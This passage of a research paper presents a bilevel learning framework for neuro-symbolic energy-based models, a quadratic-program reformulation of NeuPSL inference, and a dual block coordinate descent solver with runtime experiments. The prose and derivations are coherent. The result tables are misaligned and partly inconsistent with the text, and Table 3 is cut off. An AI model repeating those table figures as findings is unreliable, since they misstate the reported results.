[Wang et al., 2019], logic tensor networks [Badreddine et al., 2022], and NeuPSL [Pryor et al., 2023]. NeSy-EBMs use neural network outputs to parameterize an energy function and formulate an inference problem that may be non-smooth and constrained. Thus, predictions are not guaranteed to be a function of the inputs and parameters with an explicit form or to be differentiable, and traditional deep learning techniques are not directly applicable. We therefore equivalently formulate NeSy-EBM learning as a bilevel problem and, to support smooth first-order gradient-based optimization, propose a smoothing strategy that is novel to NeSy learning. Specifically, we replace the constrained NeSy energy function with its Moreau envelope. The augmented Lagrangian method for equality-constrained minimization is then applied with the new formulation. We demonstrate the effectiveness of our proposed learning framework with NeuPSL. To ensure differentiability and provide principled forms of gradients for learning, we present a new formulation and regularization of NeuPSL inference as a quadratic program. Moreover, we introduce a dual block coordinate descent (dual BCD) inference algorithm for the quadratic program. The dual BCD algorithm is the first NeuPSL inference method that produces optimal dual variables for producing both optimal primal variables and gradients for learning. Additionally, empirical results demonstrate that dual BCD is able to effectively leverage warm starts, thus improving learning runtime. Our key contributions are: (1) An improved formulation of the NeSy-EBM learning problem that establishes a foundation for applying smooth first-order gradient-based optimization techniques; (2) A reformulation of NeuPSL inference that is used to prove continuity properties and obtain explicit forms of gradients for learning; (3) A dual BCD algorithm for NeuPSL inference that naturally produces statistics necessary for computing gradients for learning and that fully leverages warm-starts to improve learning runtime; (4) Two parallelization strategies for dual BCD inference; and (5) A thorough empirical evaluation demonstrating prediction performance improvements on 8 different datasets and a learning runtime speedup of up to $100\times$. 2 RELATED WORK NeSy AI is an active area of research that incorporates symbolic (commonly logical and arithmetic) reasoning with neural networks (Bader & Hitzler [2005], d’Avila Garcez et al. [2009], Besold et al. [2017], De Raedt et al. [2020], Lamb et al. [2020], Giunchiglia et al. [2022]). We will show that learning for a general class of NeSy systems is naturally formulated as bilevel optimization (Bracken & McGill [1973], Colson et al. [2007], F. Bard [2013]). In other words, the NeSy learning objective is a function of predictions obtained by solving a lower-level inference problem that is symbolic reasoning. In this work, we focus on a general setting where the lower-level problem is an expressive and complex program capable of representing cyclic dependencies and ensuring the satisfaction of constraints during both learning and inference (Wang et al. [2019], Badreddine et al. [2022], Dasarth et al. [2023], Pryor et al. [2023], Cornelio et al. [2023]). One prominent and tangential subgroup of such NeSy systems we would like to acknowledge enforces constraints on the structure of the symbolic model, and hence the lower-level problem, to ensure the final prediction has an explicit gradient with respect to the parameters (Xu et al. [2018], Manhaeve et al. [2021], Ahmed et al. [2022]). In the deep learning community, bilevel optimization also arises in hyperparameter optimization and meta-learning (Pedregosa [2016], Franceschi et al. [2018]), generative adversarial networks (Goodfellow et al. [2014]), and reinforcement learning (Sutton & Barto [2018]). Researchers typically take one of three approaches to bilevel optimization: (1) Implicit differentiation methods compute or approximate the Hessian matrix at the lower-level problem solution to derive an analytic expression for the gradient of the upper-level objective called a hypergradient (Do et al. [2007], Pedregosa [2016], Ghadimi & Wang [2018], Rajeswaran et al. [2019], Giovannelli et al. [2022], Khanduri et al. [2023]). (2) Automatic differentiation methods unroll inference into a differentiable computational graph (Stoyanov et al. [2011], Domke [2012], Belanger et al. [2017], Ji et al. [2021]). (3) Value-Function approaches reformulate the bilevel problem as a single-level constrained program using the optimal value of the lower-level objective (the value-function) to develop principled first-order gradient-based algorithms that do not require the calculation of Hessian matrices for the lower-level problem (V. Outrata [1990], Liu et al. [2021], Sow et al. [2022], Liu et al. [2022, 2023], Kwon et al. [2023]). Note that standard algorithms for all three approaches to bilevel optimization suggest solving the lower-level problem to derive the gradients used for optimizing the bilevel program. Principled techniques for using approximate lower-level solutions to make progress on the bilevel program is an open research direction (Pedregosa [2016], Liu et al. [2021]). Further, the lower-level problem for NeSy learning (inference) is commonly constrained. Implicit differentiation methods have been developed for bilevel optimization with lower-level constraints (Giovannelli et al. [2022], Khanduri et al. [2023]). We introduce a value-function approach. 3 NESy ENERGY-BASED MODELS In this work, we use NeSy energy-based models (NeSy-EBMs) (Pryor et al. [2023]) to develop a generally applicable NeSy learning framework. Here, we provide background on NeSy-EBMs and introduce a classification of losses that motivates the need for general learning algorithms. NeSy-EBMs are a family of EBMs (LeCun et al. [2006]) that use neural model predictions to define potential functions with symbolic interpretations. NeSy-EBM energy functions are parameterized by a set of neural and symbolic weights from the domains $W_{nn}$ and $W_{sy}$, respectively, and quantify the compatibility of a target variable from a domain $\mathcal{Y}$ and neural and symbolic inputs from the domains $\mathcal{X}_{nn}$ and $\mathcal{X}_{sy}$: $$E : \mathcal{Y} \times \mathcal{X}_{sy} \times \mathcal{X}_{nn} \times W_{sy} \times W_{nn} \rightarrow \mathbb{R}.$$ NeSy-EBM inference requires first computing the output of the neural networks, neural inference, and then minimizing the energy function over the targets, symbolic inference: $$\arg\min_{y \in \mathcal{Y}} E(y, x_{sy}, x_{nn}, w_{sy}, w_{nn}).$$ (1) NeSy-EBM learning is finding weights to create an energy function that associates lower energies to target values near their truth in a set of training data. The training data consists of $P$ samples that are tuples of symbolic variables and neural network inputs: \( \{S_1 = (y_1, x_{1,sy}, x_{1,nn}), \ldots, S_P = (y_P, x_{P,sy}, x_{P,nn})\} \). Moreover, targets \( y_j \) from a training sample \( S_i \) are partitioned into labeled variables, \( t_i \), for which there is a corresponding truth value, and latent variables, \( z_i \). Without loss of generality, we write \( y_i = (t_i, z_i) \). NeSy-EBM learning losses are defined using the latent minimizer, \( z_i^* \in \arg\min_{z \in Z} E((t_i, z), x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}) \), the full minimizer, \( y_i^* \in \arg\min_{y \in Y} E(y, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}) \), and the latent and full optimal value-functions: \[ V_{z_i^*}(w_{sy}, w_{nn}) := E((t_i, z_i^*), x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}), \] \[ V_{y_i^*}(w_{sy}, w_{nn}) := E(y_i^*, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}). \] Note the optimal values-functions are functions of the parameters, inputs, and symbolic variables; however, to simplify notation, we only write the parameters as arguments. **Value-based** learning losses depend on the model weights strictly via the optimal value-functions. Two common value-based losses for NeSy-EBMs are the latent optimal value-function (energy loss), and the difference between the latent and full optimal value-functions (structured perceptron loss) (LeCun et al., 1998; Collins, 2002): \[ L_{Energy}(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i) := V_{z_i^*}(w_{sy}, w_{nn}), \] \[ L_{SP}(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i) := V_{z_i^*}(w_{sy}, w_{nn}) - V_{y_i^*}(w_{sy}, w_{nn}). \] A principled first-order gradient-based method for optimizing a value-based objective only requires differentiability of the value-functions. However, performance metrics are not always aligned with value-based losses. Moreover, they are known to have degenerate solutions, e.g., weights minimizing the loss but producing a collapsed energy function (LeCun et al., 2006; Pryor et al., 2023). Alternatively, **minimizer-based** learning losses assume the minimizer of the energy function is unique. With this assumption, energy minimization is a vector-valued function from the weight space \( W_{sy} \times W_{nn} \) to the target space \( Y \), \( \gamma_i^*(w_{sy}, w_{nn}) : W_{sy} \times W_{nn} \rightarrow Y \). Then, minimizer-based losses are compositions of a differentiable supervised loss \( d : Y \times Y \rightarrow \mathbb{R} \), and the minimizer: \[ L_d(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i) := d(y_i^*(w_{sy}, w_{nn}), t_i). \] Minimizer-based losses are general and allow learning with objectives aligned with evaluation metrics. However, a direct application of a first-order gradient based method for minimizer-based learning requires the Jacobian at the minimizer. NeSy-EBM predictions are not necessarily differentiable. Even if they are differentiable, the computation of the Jacobian is often too expensive to be practical. ### 4 A BILEVEL NESy LEARNING FRAMEWORK In this section, we introduce a general framework for the bilevel NeSy learning problem: \[ \begin{align*} \arg\min_{(w_{sy}, w_{nn}) \in W_{sy} \times W_{nn}} & \sum_{i=1}^{P} (d(y_i, t_i) + L_{Val}(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i)) + R(w_{sy}, w_{nn}) \\ \text{s.t.} & \quad y_i \in \arg\min_{y \in Y} E(y, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}), \quad \forall i \in \{1, \ldots, P\} \end{align*} \] where \( d \) and \( L_{Val} \) are a minimizer and value-based loss, respectively, and \( R : W_{sy} \times W_{nn} \rightarrow \mathbb{R} \) is a regularizer. We make the following (standard) lower-level singleton assumption. **Assumption 4.1.** \( E \) is minimized over \( y \in Y \) at a single point for every \( (w_{sy}, w_{nn}) \in W_{sy} \times W_{nn} \). Under Assumption 4.1, and regardless of the continuity and curvature properties of the upper and lower level objectives, (7) is equivalent to the following: \[ \begin{align*} \arg\min_{(w_{sy}, w_{nn}) \in W_{sy} \times W_{nn}} & \sum_{i=1}^{P} (d(y_i, t_i) + L_{Val}(E(\cdot, \cdot, \cdot, w_{sy}, w_{nn}), S_i)) + R(w_{sy}, w_{nn}) \\ \text{s.t.} & \quad E(y_i, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}) - V_{y_i^*}(w_{sy}, w_{nn}) \leq 0, \quad \forall i \in \{1, \ldots, P\}. \end{align*} \] The formulation in (8) is referred to as a **value-function** approach in bilevel optimization literature (V. Outrata, 1990; Liu et al., 2021, 2022; Sow et al., 2022; Kwon et al., 2023). Value-function approaches view the bilevel program as a single-level constrained optimization problem by leveraging the value-function as a tight lower bound on the lower-level objective. However, the inequality constraints in (8) do not satisfy any of the standard constraint qualifications that ensure the feasible set near the optimal point is similar to its linearized approximation (Nocedal & Wright, 2006). This raises a challenge for providing theoretical convergence guarantees for constrained optimization techniques. Following a recent line of value-function approaches to bilevel programming (Liu et al., 2021; Sow et al., 2022; Liu et al., 2023), we overcome this challenge by allowing at most an \( \epsilon > 0 \) violation in each constraint in (8). With this relaxation, strictly feasible points exist and, for instance, the linear independence constraint qualification (LICQ) can hold. Another challenge that arises from (8) is that the energy function of NeSy-EBMs is typically non-differentiable with respect to the targets and even infinite-valued to implicitly represent constraints. As a result, penalty or augmented Lagrangian functions derived from (8) are intractable. Therefore, we substitute each instance of the energy function evaluated at the training sample \( i \) and parameterized by \((w_{sy}, w_{nn})\) in the constraints of (8) with the following function: \[ M_i(y; w_{sy}, w_{nn}, \rho) := \inf_{\hat{y} \in Y} \left( E(\hat{y}, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}) + \frac{1}{2\rho} \| \hat{y} - y \|^2_2 \right), \] where \( \rho \) is a positive scalar. For convex \( E \), (9) is the Moreau envelope of the energy function Rockafellar (1970); Parikh & Boyd (2013). In general, even for non-convex energy functions, the smoothing in (9) preserves global minimizers and minimum values, i.e., \( y^*_i(w_{sy}, w_{nn}) = \arg\min_y M_i(y; w_{sy}, w_{nn}, \rho) \) and \( V_{y^*_i}(w_{sy}, w_{nn}) = \min_y M_i(y; w_{sy}, w_{nn}, \rho) \). Moreover, under Assumption 4.1, each \( M_i \) is finite for all \( y \in Y \) even if the energy function is not. When the energy function is a lower semi-continuous convex function, its Moreau envelope is convex, finite, and continuously differentiable, and its gradient with respect to \( y \) is: \[ \nabla_y M_i(y; w_{sy}, w_{nn}, \rho) = \frac{1}{\rho} \left( y - \arg\min_{\hat{y} \in Y} \left( \rho E(\hat{y}, x_{i,sy}, x_{i,nn}, w_{sy}, w_{nn}) + \frac{1}{2} \| \hat{y} - y \|^2_2 \right) \right) \] Convexity is a sufficient but not necessary condition to ensure each \( M_i \) is differentiable with respect to the target variables. See Bonnans & Shapiro (2000) for results regarding the sensitivity of optimal value-functions to perturbations. We propose the following relaxed and smoothed value-function approach to finding an approximate solution of (7): \[ \begin{align*} \arg\min_{(w_{sy}, w_{nn}) \in W_{sy} \times W_{nn}} \sum_{i=1}^{P} (d(y_i, t_i) + L_{val}(E(\cdot, \cdot, w_{sy}, w_{nn}), S_i)) + R(w_{sy}, w_{nn}) \\ \text{s.t. } M_i(y_i; w_{sy}, w_{nn}, \rho) - V_{y^*_i}(w_{sy}, w_{nn}) \leq \epsilon, \quad \forall i \in \{1, \cdots, P\}, \end{align*} \] The formulation (11) is the core of our proposed NeSy-EBM learning framework outlined in Algorithm 1. The algorithm proceeds by approximately solving instances of (11) in a sequence defined by a decreasing \( \epsilon \). This is a graduated approach to solving (8) with instances of (11) that are increasingly tighter approximations. Each instance of (11) is optimized using only first-order gradients of the energy and value-functions with the bound-constrained augmented Lagrangian algorithm, Algorithm 17.4 from Nocedal & Wright (2006). Specifically, the algorithm finds approximate minimizers of the problem’s augmented Lagrangian for a fixed setting of the penalty parameters using gradient descent. To simplify notation, let the equality constraints in (11) be denoted by: \[ c_i(y_i, w_{sy}, w_{nn}; t) := M_i(y_i; w_{sy}, w_{nn}, \rho) - V_{y^*_i}(w_{sy}, w_{nn}) - t, \] for each constraint indexed \( i \in \{1, \cdots, P\} \). Moreover, let \( c(y_1, \cdots, y_P, w_{sy}, w_{nn}; t) := [c_i(y_i, w_{sy}, w_{nn}; t)]_{i=1}^{P} \). The augmented Lagrangian function corresponding to (11) introduces a quadratic penalty parameter \( \mu \) and \( P \) linear penalty parameters \( \lambda := [\lambda_i]_{i=1}^{P} \), as follows: \[ L_A(w_{sy}, w_{nn}, y_1, \cdots, y_P, s; \lambda, \mu, t) := \sum_{i=1}^{P} (d(y_i, t_i) + L_{val}(E(\cdot, \cdot, w_{sy}, w_{nn}), S_i)) \\ + \frac{\mu}{2} \sum_{i=1}^{P} (c_i(y_i, w_{sy}, w_{nn}; t) + s_i)^2 + \sum_{i=1}^{P} \lambda_i(c_i(y_i, w_{sy}, w_{nn}; t) + s_i) + R(w_{sy}, w_{nn}). \] where we introduced $P$ slack variables, $s = [s_i]_{i=1}^P$, for each inequality constraint. We make the following assumption to ensure the augmented Lagrangian function is differentiable: **Assumption 4.2.** Every $V_{y_i^*}$, $V_{z_i^*}$, and $M_i$ is differentiable with respect to the weights. We employ the bound-constrained augmented Lagrangian algorithm to solve (11) (see Appendix B for details). This method provides a principled algorithm for updating the penalty parameters and ensures fundamental convergence properties of our learning framework. Notably, we have that limit points of the iterate sequence are stationary points of $\|c(y_1, \cdots, y_P, w_{sy}, w_{nn}) + s\|^2$ when the problem has no feasible points. When the problem is feasible and LICQ holds at the limits, they are KKT points of (11) (Theorem 17.2 in Nocedal & Wright (2006)). Convergence rates and stronger guarantees are likely possible from analyzing the structure of the energy function for specific NeSy-EBMs and is a direction for future work. The value for $\ell$ is halved every time an approximate solution to the Lagrangian subproblem is reached. We suggest starting points for each $y_i^{(0)}$ to be the latent inference minimizer and $\ell^{(0)}$ to be the maximum difference in the value-function and the smooth energy function over all $y_i^{(0)}$. The outer loop of the NeSy-EBM learning framework may be stopped by either watching the progress of a training or validation evaluation metric, or by specifying a final value for $\ell$. 5 NEUPSL AND DEEP HINGE-LOSS MARKOV RANDOM FIELDS We demonstrate the applicability of our learning framework with Neural Probabilistic Soft Logic (NeuPSL), a general class of NeSy-EBMs designed for scalable joint reasoning (Pryor et al., 2023). In NeuPSL, relations and attributes are represented by atoms, and dependencies between atoms are encoded with first-order logical clauses and linear arithmetic inequalities referred to as rules. Atom values can be target variables, observations, or outputs from a neural network. The rules and atoms are translated into potentials measuring rule satisfaction and are aggregated to define a member of a tractable class of graphical models: deep hinge-loss Markov random fields (deep HL-MRF). **Definition 5.1.** Let $g = [g_i]_{i=1}^{n_g}$ be functions with corresponding weights $w_{nn} = [w_{nn,i}]_{i=1}^{n_g}$ and inputs $x_{nn}$ such that $g_i : (w_{nn,i}, x_{nn}) \mapsto [0, 1]$. Let $y \in [0, 1]^{n_y}$ and $x_{sy} \in [0, 1]^{n_x}$. A deep hinge-loss potential is a function of the form: $$\phi(y, x_{sy}, g(x_{nn}, w_{nn})) := \max\{a_{\phi,y}^T y + a_{\phi,x_{sy}}^T x_{sy} + a_{\phi,g}^T g(x_{nn}, w_{nn}) + b_\phi, 0\}^p,$$ where $a_{\phi,y} \in \mathbb{R}^{n_y}$, $a_{\phi,x_{sy}} \in \mathbb{R}^{n_x}$, and $a_{\phi,g} \in \mathbb{R}^{n_g}$ are variable coefficient vectors, $b_\phi \in \mathbb{R}$ is a vector of constants, and $p \in \{1, 2\}$. Let $\mathcal{T} = [\tau_i]_{i=1}^m$ denote an ordered partition of a set of $m$ deep hinge-loss potentials. Further, define $\Phi(y, x_{sy}, g(x_{nn}, w_{nn})) := \sum_{k \in \mathcal{T}} \phi_k(y, x_{sy}, g(x_{nn}, w_{nn}))$. Let $w_{sy}$ be a vector of $r$ non-negative symbolic weights corresponding to the partition $\mathcal{T}$. Then, a deep hinge-loss energy function is: $$E(y, x_{sy}, x_{nn}, w_{sy}, w_{nn}) := w_{sy}^T \Phi(y, x_{sy}, g(x_{nn}, w_{nn})).$$ Let $a_{ck,y} \in \mathbb{R}^{n_y}$, $a_{ck,x} \in \mathbb{R}^{n_x}$, $a_{ck,g} \in \mathbb{R}^{n_g}$, and $b_{ck} \in \mathbb{R}$ for each $k \in 1, \ldots, q$ and $q \geq 0$ be vectors defining linear inequality constraints and a feasible set: $$\Omega(x_{sy}, g) := \left\{y \in [0, 1]^{n_y} \mid a_{ck,y}^T y + a_{ck,x_{sy}}^T x_{sy} + a_{ck,g}^T g + b_{ck} \leq 0, \forall k = 1, \ldots, q\right\}.$$ Then a deep hinge-loss Markov random field defines the conditional probability density: $$P(y | x_{sy}, x_{nn}) := \begin{cases} \exp(-E(y, x_{sy}, x_{nn}, w_{sy}, w_{nn})) / \int_{y \in \Omega(\cdot)} \exp(-E(y, x_{sy}, x_{nn}, w_{sy}, w_{nn})) dy & y \in \Omega(x_{sy}, g(x_{nn}, w_{nn})) \\ 0 & \text{o.w.} \end{cases}$$ NeuPSL inference is finding the MAP state of the conditional distribution defined by a deep HL-MRF, i.e., finding the minimizer of the energy function over the feasible set. $$\min_{y \in \mathbb{R}^{n_y}} w_{sy}^T \Phi(y, x_{sy}, g(x_{nn}, w_{nn})) \quad \text{s.t. } y \in \Omega(x_{sy}, g(x_{nn}, w_{nn})).$$ As each of the potentials are convex, (15) is a non-smooth convex linearly constrained program. 5.1 A smooth formulation of inference In this section, we introduce a primal and dual formulation of NeuPSL inference as a linearly constrained convex quadratic program (LCQP). (See Appendix C.1 for details.) In summary, \( m \) slack variables with lower bounds and \( 2 \cdot n_y + m \) linear constraints are defined to represent the target variable bounds and deep hinge-loss potentials. All \( 2 \cdot n_y + m \) variable bounds, \( m \) potentials, and \( q \geq 0 \) constraints are collected into a \( (2 \cdot n_y + q + 2 \cdot m) \times (n_y + m) \) dimensional matrix \( A \) and a vector of \( (2 \cdot n_y + q + 2 \cdot m) \) elements that is an affine function of the neural predictions and symbolic inputs \( b(x_{sy}, g(x_{nn}, w_{nn})) \). Moreover, the slack variables and a \( (n_y + m) \times (n_y + m) \) positive semi-definite diagonal matrix, \( D(w_{sy}) \), and a \( (n_y + m) \) dimensional vector, \( c(w_{sy}) \), are created using the symbolic weights to define a quadratic objective. Further, we gather the original target variables and the slack variables into a vector \( \nu \in \mathbb{R}^{n_y+m} \). Altogether, the regularized convex LCQP reformulation of NeuPSL inference is: \[ V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) := \min_{\nu \in \mathbb{R}^{n_y+m}} \nu^T(D(w_{sy}) + \epsilon I)\nu + c(w_{sy})^T\nu \quad \text{s.t. } A\nu + b(x_{sy}, g(x_{nn}, w_{nn})) \leq 0, \] where \( \epsilon \geq 0 \) is a scalar regularization parameter added to the diagonal of \( D \) to ensure strong convexity (needed in the next subsection). The effect of the added regularization is empirically studied in Appendix E.3. The function \( V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) \) in (16) is the optimal value-function of the LCQP formulation of NeuPSL inference referred to in the previous section. By Slater’s constraint qualification, we have strong duality when there is a feasible solution to (16). In this case, an optimal solution to the dual problem yields an optimal solution to the primal problem. The Lagrange dual problem of (16) is: \[ \min_{\mu \in \mathbb{R}^{n_y+m+q}} h(\mu; w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) \] \[ := \frac{1}{4}\mu^T A(D(w_{sy}) + \epsilon I)^{-1}A^T\mu + \frac{1}{2}(A(D(w_{sy}) + \epsilon I)^{-1}c(w_{sy}) - 2b(x_{sy}, g(x_{nn}, w_{nn})))^T\mu, \] where \( \mu \) is the vector of dual variables and \( h(\mu; w_{sy}, b(w_{nn})) \) is the LCQP dual objective function. As \( (D(w_{sy}) + \epsilon I) \) is diagonal, it is easy to invert, and thus it is practical to work in the dual space and map dual to primal variables. The dual-to-primal variable mapping is: \[ \nu \leftarrow -\frac{1}{2}(D(w_{sy}) + \epsilon I)^{-1}(A^T\mu + c(w_{sy})). \] On the other hand, the primal-to-dual mapping is more computationally expensive and requires calculating a pseudo-inverse of the constraint matrix \( A \). 5.2 Continuity of inference We use the LCQP formulation in (16) to establish continuity and curvature properties of the NeuPSL energy minimizer and the optimal value-function provided in the following theorem. The proof is provided in Appendix C.2. **Theorem 5.2.** Suppose for any setting of \( w_{nn} \in \mathbb{R}^{n_g} \) there is a feasible solution to NeuPSL inference (16). Further, suppose \( \epsilon > 0 \), \( w_{sy} \in \mathbb{R}_+^{r_y} \), and \( w_{nn} \in \mathbb{R}^{n_g} \). Then: - The minimizer of (16), \( y^*(w_{sy}, w_{nn}) \), is a \( O(1/\epsilon) \) Lipschitz continuous function of \( w_{sy} \). - \( V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) \) is concave over \( w_{sy} \) and convex over \( b(x_{sy}, g(x_{nn}, w_{nn})) \). - \( V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) \) is differentiable with respect to \( w_{sy} \). Moreover, \[ \nabla_{w_{sy}} V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) = \Phi(y^*(w_{sy}, w_{nn}), x_{sy}, g(x_{nn}, w_{nn})). \] Furthermore, \( \nabla_{w_{sy}} V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) \) is Lipschitz continuous over \( w_{sy} \). - If there is a feasible point \( \nu \) strictly satisfying the \( i \)th inequality constraint of (16), i.e., \( A[i]\nu + b(x_{sy}, g(x_{nn}, w_{nn}))[i] < 0 \), then \( V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) \) is subdifferentiable with respect to the \( i \)th constraint constant \( b(x_{sy}, g(x_{nn}, w_{nn}))[i] \). Moreover, \[ \partial_{b[i]} V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) = \{\mu^*[i] | \mu^* \in \arg\min_{\mu \in \mathbb{R}^{n_y+m+q}} h(\mu; w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})))\}. \] Furthermore, if \( g(x_{nn}, w_{nn}) \) is a smooth function of \( w_{nn} \), then so is \( b(x_{sy}, g(x_{nn}, w_{nn})) \), and the set of regular subgradients of \( V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))) \) is: \[ \partial_{w_{nn}} V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn})) \supset \nabla_{w_{nn}} b(x_{sy}, g(x_{nn}, w_{nn}))^T \partial_b V(w_{sy}, b(x_{sy}, g(x_{nn}, w_{nn}))). \] Theorem 5.2 provides a simple explicit form of the value-function gradient with respect to the symbolic weights and regular subgradient with respect to the neural weights. Moreover, this result is directly applicable to the Moreau envelope of the NeuPSL energy function used in Section 4, as it is a regularized value-function. Thus, Theorem 5.2 supports the principled application of Algorithm 1 for learning both the symbolic and neural weights of a NeuPSL model. 5.3 Dual block coordinate descent The regular subgradients in Theorem 5.2 are functions of the optimal dual variables of the LCQP inference problem in (17). For this reason, we introduce a block coordinate descent (BCD) (Wright 2015) algorithm for working directly with the dual LCQP formulation of inference. Details of the algorithm are provided in Appendix D. Our dual BCD algorithm is the first method specialized for the dual LCQP inference and is therefore also the first to produce optimal dual variables that directly yield both optimal primal variables and principled gradients for learning, all without the need to compute a pseudo-inverse of the constraint matrix. The dual BCD algorithm proceeds by successively minimizing the objective along the subgradient of a block of dual variables. For this reason, dual BCD guarantees descent at every iteration, partially explaining its effectiveness at leveraging warm-starts and improving learning runtimes. The algorithm is stopped when the primal-dual gap drops below a threshold $\delta > 0$. We suggest a practical choice of variable blocks with efficient methods for computing the objective subgradients and solving the steplength subproblems. Additionally, we develop an efficient method for identifying connected components of the factor graph defined by the deep HL-MRF yielding a variable partition that the dual objective is additively separable over to parallelize the BCD updates. Moreover, inspired by lock-free parallelization strategies (Bertsekas & N. Tsitsiklis 1989; Recht et al. 2011; Liu et al. 2015), we also propose a variant of the dual BCD inference algorithm that sacrifices the theoretical guaranteed descent property for significant runtime improvements. In Section 6, we show that the lock-free dual BCD algorithm consistently finds a solution satisfying the stopping criterion, and surprisingly, is still highly effective at leveraging warm starts. 6 Empirical evaluation We evaluate the runtime and prediction performance of our proposed NeSy inference and parameter learning algorithms on the 8 datasets in Table 1. The table includes the dataset’s inference task, the associated prediction performance metric, and whether the corresponding NeuPSL model has deep neural network parameters. Unless noted otherwise, all experiments are run on 5 splits and the average and standard deviation of times and performance metric values are reported. Details on the datasets, hardware specifications, hyperparameter searches, and model architectures are provided in Appendix E. For learning experiments in Section 6.2 and Section 6.3, NeuPSL models with weights trained using value-based learning losses, e.g., energy and structured perceptron (SP), use mirror descent (Kivinen & Warmuth 1997; Shalev-Shwartz 2012) on the symbolic weights constrained to the unit simplex and Adam (P. Kingma & Lei Ba 2017) for the neural weights. NeuPSL models with weights trained using minimizer-based losses, e.g., mean squared error (MSE) and binary cross entropy (BCE), use our proposed NeSy learning framework in Algorithm 1, with a scaled energy loss term added to the objective as in (7). Moreover, optimization of the augmented Lagrangian, line 4 of Algorithm 1, is performed using the bound constrained augmented Lagrangian algorithm (Appendix B) with mirror descent on the symbolic weights and Adam for the neural weights. Table 1: Datasets used for empirical evaluations. | Dataset | Deep | Task | Perf. Metric | |------------------|------|------------|--------------| | CreateDebate | | Stance Class.| AUROC | | Hasan & Ng [2013]| | Stance Class.| AUROC | | 4Forums | | Link Pred. | AUROC | | Walker et al. [2012]| | Link Pred. | MAE | | Epinions | | Regression | Accuracy | | Richardson et al. [2003]| | Node Class. | Accuracy | | DDPM | | Image Class.| Accuracy | | Ramesh et al. [2009]| | | | | Yelp | | | | | CiteSeer | ✓ | | | | Sen et al. [2008]| ✓ | | | | Cora | ✓ | | | | Sen et al. [2008]| ✓ | | | | MNIST-And Mannaev et al. [2018]| ✓ | | | 1 All code and data is available at https://github.com/convexbilevelnesylearning 6.1 Inference Runtime We begin by examining the runtime of symbolic inference. We evaluate the alternating direction method of multipliers (ADMM) [Boyd et al., 2010], the current state-of-the-art inference algorithm for NeuPSL, and our proposed inference algorithms: connected component parallel dual BCD (CC D-BCD) and lock-free parallel dual BCD (LF D-BCD). We also evaluate the performance of Gurobi, a leading off-the-shelf optimizer, and subgradient descent (GD) in Appendix E.4. All inference algorithms have access to the same computing resources. We run a hyperparameter search, detailed in Appendix E.4, for each algorithm, and the configuration yielding a prediction performance that is within a standard deviation of the best and completed with the lowest runtime is reported. All algorithms are stopped when the $L_\infty$ norm of the primal variable change between iterates is less than 0.001. The total average inference runtime in seconds for each algorithm and model is provided in Table 2. Surprisingly, despite the potential for an inexact solution to the BCD steplength subproblem, LF D-BCD is faster than CC D-BCD in the first 7 datasets and demonstrates up to $6 \times$ speedup over CC D-BCD in Yelp. However, in MNIST-Add datasets, CC D-BCD is up to $10 \times$ faster than LF D-BCD as there is a high number of tightly connected components, one for each addition instance. This behavior highlights the complementary strengths of the two parallelization strategies. LF D-BCD should be applied to problems with larger factor graph representations that are connected while CC D-BCD is effective when there are many similarly sized connected components. 6.2 Learning Runtime Next, we study how the algorithms applied to solve inference affect the learning runtime with the SP and MSE losses. Specifically, we examine the cumulative time required for ADMM and D-BCD inference to complete 500 weight updates on the first 7 datasets in Table 1 and 100 weight updates on MNIST-Add datasets. Hyperparameters used for SP and MSE learning are reported in Appendix E.5. For inference, we apply the same hyperparameters used in the previous section and the fastest parallelization method for D-BCD. Table 3 shows that the D-BCD algorithm consistently results in the lowest total inference runtime, validating its ability to leverage warm starts to improve learning runtimes. Notably, on the DDI dataset, D-BCD achieves roughly a $100 \times$ speedup over ADMM. Moreover, on MNIST-Add2, ADMM timed out with over 6 hours of inference time for SP and MSE learning, while D-BCD accumulated less than 0.5 and 1.2 hours of inference runtime on average for SP and MSE, respectively. 6.3 Learning Prediction Performance In our final experiment, we analyze the prediction performance of NeuPSL models trained with our NeSy-EBM learning framework. A hyperparameter search (detailed in Appendix E.6) is performed over learning steplengths, regularizations, and parameters for Algorithm 1. **HL-MRF learning** We first evaluate the prediction performance on non-deep vari- ### Table 2: Time in seconds for inference using ADMM and our proposed CC D-BCD and LF D-BCD algorithms on each dataset. | Dataset | ADMM | CC D-BCD | LF D-BCD | |-------------|------------|------------|------------| | CreateDebate| 9.98 ± 1.13| 0.05 ± 0.02| 0.05 ± 0.03| | 4Forums | 15.17 ± 0.74| 0.11 ± 0.02| 0.05 ± 0.01| | Epinions | 0.36 ± 0.041| 1.84 ± 0.4| 0.26 ± 0.04| | Citeseer | 0.63 ± 0.07| 1.36 ± 0.24| 0.49 ± 0.08| | Cora | 0.71 ± 0.07| 6.46 ± 3.5| 0.79 ± 0.19| | DDI | 7.85 ± 0.38| 31.47 ± 17.7| 1.76 ± 0.17| | Yelp | 6.37 ± 1.19| 15.82 ± 10.35| 1.25 ± 0.85| | MNIST-Add1 | 11.45 ± 1.32| 10.23 ± 1.04| 115 ± 45| | MNIST-Add2 | 285 ± 66| 29.09 ± 8.00| 1.189 ± 16| ### Table 3: Cumulative time in seconds for ADMM and D-BCD inference during learning with SP and MSE losses. | Dataset | SP | MSE | |-------------|-------------|-------------| | CreateDebate| 10.68 ± 8.63| 0.34 ± 0.36| | 4Forums | 11.87 ± 12.81| 